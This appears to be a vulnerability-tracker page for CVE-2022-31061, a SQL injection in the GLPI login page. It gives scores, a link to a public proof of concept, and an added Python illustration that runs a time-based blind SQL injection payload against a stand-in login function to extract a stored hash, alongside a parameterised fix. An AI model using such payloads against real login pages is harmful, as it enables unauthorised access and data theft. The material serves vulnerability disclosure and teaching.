CVE-2022-31061

CRITICAL

GLPI 9.3.0 to 10.0.1 - Unauthenticated Time-Based Blind SQL Injection via Login Page

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2022-31061, a PoC published by Wangyanan131.

AI-analyzed exploit summary: This is a functional proof-of-concept exploit for CVE-2022-31061, an unauthenticated SQL injection in GLPI versions >= 9.3.0 and < 10.0.2. The exploit uses a time-based blind SQL injection on the login page and only works when LDAP authentication is enabled on the target; the injected condition makes the database delay its response, and the attacker infers one bit of information per request from whether that delay occurs.
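The following added example illustrates the time-based blind technique named in the summary against a stand-in login function. It is not GLPI code, does not reproduce the GLPI login query, the LDAP prerequisite or the published PoC's payload, and all names in it (the glpi_users table, the admin row, the SECRET_HASH value, the SLEEP delay) are constructed for the illustration. MySQL's SLEEP() is emulated by registering a Python function of that name in SQLite so that the injected SQL really executes.

```python
"""Time-based blind SQL injection against a stand-in login function.

Added illustration of the technique; not GLPI's code or query. The
vulnerable function interpolates the username into SQL (CWE-89); the
hardened one binds it as a parameter. The attacker only observes how
long each login attempt takes.
"""
import sqlite3
import time
from typing import Callable, Optional

SLEEP_SECONDS = 0.1          # delay the injected condition triggers (assumed)
THRESHOLD = SLEEP_SECONDS / 2  # responses slower than this count as "true"
HEX = "0123456789abcdef"
SECRET_HASH = "deadbeef"     # constructed value the attacker wants to read


def _sleep(seconds: float) -> int:
    """SQLite stand-in for MySQL's SLEEP(): blocks, then returns 0."""
    time.sleep(seconds)
    return 0


def make_db() -> sqlite3.Connection:
    """In-memory database with one constructed user row."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, _sleep)
    conn.execute("CREATE TABLE glpi_users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO glpi_users VALUES ('admin', ?)", (SECRET_HASH,))
    return conn


CONN = make_db()


def vulnerable_login(username: str) -> bool:
    """Builds the query by string interpolation: the input becomes SQL."""
    query = f"SELECT 1 FROM glpi_users WHERE name = '{username}'"
    return CONN.execute(query).fetchone() is not None


def safe_login(username: str) -> bool:
    """Same lookup with a bound parameter: the input stays data."""
    row = CONN.execute(
        "SELECT 1 FROM glpi_users WHERE name = ?", (username,)
    ).fetchone()
    return row is not None


def probe(login: Callable[[str], bool], position: int, guess: str) -> bool:
    """Return True when the response delay shows the guessed character is right.

    The payload closes the string literal, adds a CASE that calls SLEEP()
    only when one character of the admin password matches, and re-balances
    the quotes so the statement still parses.
    """
    payload = (
        "' OR (CASE WHEN substr((SELECT password FROM glpi_users "
        f"WHERE name='admin'),{position},1)='{guess}' "
        f"THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END) AND '1'='1"
    )
    start = time.perf_counter()
    login(payload)
    return time.perf_counter() - start >= THRESHOLD


def extract_secret(login: Callable[[str], bool],
                   length: int = len(SECRET_HASH)) -> Optional[str]:
    """Recover the stored value one character at a time via the timing oracle.

    Returns None as soon as a position produces no delayed response, which
    is what happens against the parameterised login: the payload is then
    just an unknown username and every request returns immediately.
    """
    recovered = ""
    for pos in range(1, length + 1):
        for c in HEX:
            if probe(login, pos, c):
                recovered += c
                break
        else:
            return None
    return recovered


if __name__ == "__main__":
    print("vulnerable:", extract_secret(vulnerable_login))  # recovers the hash
    print("hardened:  ", extract_secret(safe_login))        # None
```

The linear scan over a 16-character alphabet is the simplest oracle loop; a real PoC usually halves the request count with a binary search on the character's code point, but the observable is the same: one delayed response per true condition, and nothing in the page body ever reveals the data directly.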

Description

GLPI is a free asset and IT management software package that also covers data center management, an ITIL service desk, license tracking and software auditing. Affected versions contain a SQL injection vulnerability reachable from the login page; no user credentials are required to exploit it. Users are advised to upgrade as soon as possible, as there are no known workarounds for this issue.

Exploits (1)

nomisec WORKING POC 4 stars
by Wangyanan131 · poc
https://github.com/Wangyanan131/CVE-2022-31061

Classification
Working Poc 95%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: GLPI >= 9.3.0 and < 10.0.2
No auth needed
Prerequisites: LDAP authentication must be enabled on the target GLPI instance
devstral-2 · analyzed Feb 16, 2026

Scores

CVSS v3 9.8
EPSS 0.4591
EPSS Percentile 97.7%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact total

Details

CWE
CWE-89
Status published
Products (1)
glpi-project/glpi >= 9.3.0, < 10.0.2
Published Jun 28, 2022
Tracked Since Feb 18, 2026